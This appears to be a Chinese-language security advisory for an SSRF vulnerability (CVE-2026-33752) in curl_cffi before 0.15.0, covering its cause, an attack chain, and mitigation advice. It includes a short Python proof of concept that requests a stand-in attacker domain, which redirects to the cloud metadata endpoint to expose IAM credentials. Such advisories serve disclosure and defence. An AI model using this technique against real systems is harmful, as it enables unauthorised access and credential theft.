CVE-2026-33752 CVSS 8.6 高危

CVE-2026-33752 curl_cffi服务器端请求伪造漏洞

披露日期: 2026-04-06

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33752

漏洞类型

SSRF (服务器端请求伪造)

CVSS评分

8.6 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

curl_cffi

漏洞概述

curl_cffi是一个用于curl的Python绑定库。在0.15.0版本之前，该库未对内部IP范围实施请求限制，并且会通过底层的libcurl自动跟随重定向。由于这一缺陷，攻击者可以控制URL将请求重定向到内部服务（例如云元数据端点）。此外，curl_cffi的TLS模拟功能可能使这些请求看起来像合法的浏览器流量，从而绕过某些网络控制。该漏洞已在0.15.0版本中修复。

技术细节

该漏洞的根源在于curl_cffi库在处理HTTP请求时缺乏对目标IP地址的有效校验机制，特别是针对内网IP地址（如127.0.0.1, 169.254.169.254等）的过滤。当应用程序使用该库发起请求且未禁用自动重定向时，攻击者可以构造恶意的URL，利用HTTP 301/302重定向将请求引向受信任的内网服务。由于curl_cffi旨在模拟主流浏览器的TLS指纹，其发出的请求在流量特征上与真实浏览器高度相似。这使得攻击者能够绕过基于传统User-Agent或TLS指纹识别的防火墙或WAF规则，实现对内网服务的未授权访问。典型的攻击场景包括攻击云服务商的元数据服务，从而获取敏感信息或临时凭证，进而横向移动。这是一个典型的服务端请求伪造（SSRF）漏洞，结合了TLS指纹模拟的高级绕过技术。

攻击链分析

STEP 1

攻击者发现目标系统使用了存在漏洞的curl_cffi版本（< 0.15.0）作为HTTP客户端。

STEP 2

攻击者诱导目标系统向攻击者控制的恶意URL发起请求。

STEP 3

攻击者的服务器响应HTTP 302重定向，指向内网敏感地址（如云元数据服务 169.254.169.254）。

STEP 4

curl_cffi库自动跟随重定向，利用TLS模拟特性绕过网络防护，访问内网资源。

STEP 5

内网服务的响应数据（如IAM凭证）被返回给攻击者，导致信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import sys
from curl_cffi import requests

# Exploit concept for CVE-2026-33752
# This script demonstrates how an attacker can force the server to request internal resources.

def exploit_ssrf(target_url):
    try:
        # The attacker controls 'target_url'.
        # It should respond with a redirect (302) to an internal IP (e.g., metadata service).
        print(f"[+] Sending request to malicious URL: {target_url}")

        # curl_cffi < 0.15.0 follows redirects to internal IPs automatically
        # and uses TLS impersonation which might bypass WAFs.
        response = requests.get(target_url)

        # If the internal service returns content, it will be exposed here.
        print("[+] Response received:")
        print(response.text)

    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    # Example: A controlled URL that redirects to http://169.254.169.254/latest/meta-data/
    malicious_redirect_url = "http://attacker-controlled-domain.com/redirect_to_aws_metadata"
    exploit_ssrf(malicious_redirect_url)

影响范围

curl_cffi < 0.15.0

防御指南

临时缓解措施

如果无法立即升级，应在应用层面对请求的目标URL进行严格的校验。解析域名并禁止解析到内网IP地址（如127.0.0.0/8, 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16）。同时，禁用自动跟随重定向功能（allow_redirects=False），并确保只允许访问白名单内的域名或IP地址。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表